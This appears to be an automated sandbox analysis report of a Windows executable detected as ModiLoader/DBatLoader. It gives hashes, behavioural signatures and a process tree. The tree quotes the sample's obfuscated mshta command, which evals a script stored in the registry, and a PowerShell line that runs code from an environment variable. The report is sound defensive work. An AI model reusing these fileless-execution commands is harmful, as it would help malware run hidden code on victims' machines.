Analysis
-
max time kernel
81s -
max time network
41s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
01/10/2022, 22:12
Static task
static1
Behavioral task
behavioral1
Sample
cec8960741377aa0ee61eb66ef8bfdd16a8f1160ef44e0b372957b613fb5d479.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
cec8960741377aa0ee61eb66ef8bfdd16a8f1160ef44e0b372957b613fb5d479.exe
Resource
win10v2004-20220901-en
General
-
Target
cec8960741377aa0ee61eb66ef8bfdd16a8f1160ef44e0b372957b613fb5d479.exe
-
Size
466KB
-
MD5
6af17e74bc05e1780e7e21c96f508c3f
-
SHA1
ad691618c705867c8d77da814d94e748cbf83220
-
SHA256
cec8960741377aa0ee61eb66ef8bfdd16a8f1160ef44e0b372957b613fb5d479
-
SHA512
2771d1c64a1997a8de8cf5f4aed9cf3812a9020df589b856b0106a5e0608642594d86b97c01929afbe4d2626d948c86f856894d79b868f714b38164c93ee5d3d
-
SSDEEP
12288:bZsOp1DhDL4JrSLL4vSuRKJolUM9pw+Vw1z4RJFlfrhY:bZPnDhVLcvSuMIUMzV0cflfrS
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 788 1788 mshta.exe 26 -
ModiLoader Second Stage 3 IoCs
resource yara_rule behavioral1/memory/1348-56-0x0000000000400000-0x000000000047A000-memory.dmp modiloader_stage2 behavioral1/memory/1348-57-0x0000000000050000-0x0000000000110000-memory.dmp modiloader_stage2 behavioral1/memory/1348-61-0x0000000000050000-0x0000000000110000-memory.dmp modiloader_stage2 -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1532 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1532 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 788 wrote to memory of 1532 788 mshta.exe 28 PID 788 wrote to memory of 1532 788 mshta.exe 28 PID 788 wrote to memory of 1532 788 mshta.exe 28 PID 788 wrote to memory of 1532 788 mshta.exe 28 PID 1532 wrote to memory of 996 1532 powershell.exe 30 PID 1532 wrote to memory of 996 1532 powershell.exe 30 PID 1532 wrote to memory of 996 1532 powershell.exe 30 PID 1532 wrote to memory of 996 1532 powershell.exe 30
Processes
-
C:\Users\Admin\AppData\Local\Temp\cec8960741377aa0ee61eb66ef8bfdd16a8f1160ef44e0b372957b613fb5d479.exe"C:\Users\Admin\AppData\Local\Temp\cec8960741377aa0ee61eb66ef8bfdd16a8f1160ef44e0b372957b613fb5d479.exe"1⤵PID:1348
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" javascript:ZlP17RZip="jo";Ev9=new%20ActiveXObject("WScript.Shell");vTaDN7w="V";kW3TY=Ev9.RegRead("HKLM\\software\\Wow6432Node\\NLy9rvp\\9qgZreA");ygYXH80tF="DrAnY";eval(kW3TY);GXQOYcbb2="6";1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:788 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:gpfkeaa2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1532 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 4643⤵PID:996
-
-